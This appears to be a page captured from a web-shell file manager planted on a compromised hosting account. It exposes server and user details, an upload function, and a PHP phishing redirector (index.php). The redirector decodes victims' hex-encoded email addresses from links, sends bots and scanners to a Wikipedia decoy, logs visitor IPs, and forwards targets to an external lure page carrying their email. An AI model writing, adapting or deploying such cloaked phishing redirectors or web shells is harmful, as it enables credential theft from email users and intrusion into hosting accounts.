HEX
Server: Apache
System: Linux sxb1plzcpnl503971.prod.sxb1.secureserver.net 4.18.0-553.52.1.lve.el8.x86_64 #1 SMP Wed May 21 15:31:29 UTC 2025 x86_64
User: nciq25gegoxa (9650876)
PHP: 7.4.33
Disabled: NONE
$ pwd: /home/nciq25gegoxa/public_html/ha8x/
Upload Files
File: /home/nciq25gegoxa/public_html/ha8x/index.php
<?php
error_reporting(0);
require 'anti.php';
// require 'anti2.php';
require 'antibot.php';

// Get the 'cl' parameter and parse it
$cl = explode('/', $_GET['cl']);
$get = $cl[0];
$pieces = explode("-", $get);

$email = $pieces[0];

// Validate email
if ($email == "") {
    header('Location: https://en.wikipedia.org/wiki/Art');
    exit;
}

$email64 = hex2bin($email);

if (strpos($email64, '@') === false) {
    header('Location: https://en.wikipedia.org/wiki/Art');
    exit;
}

// Log visit
$file = fopen("clicks.txt", "a");
fwrite($file, $_SERVER['REMOTE_ADDR'] . ' ' . $_SERVER['HTTP_USER_AGENT'] . "rn");
fclose($file);

// Generate session token
$praga = md5(rand());

// Redirect to malicious/tracking URL - using original hex value instead of decoded email
header("Location: https://leanestate.de/drv30c23goo53c23goo23googlec5530c23589a/#{$email}");
exit;
?>
@ Telegram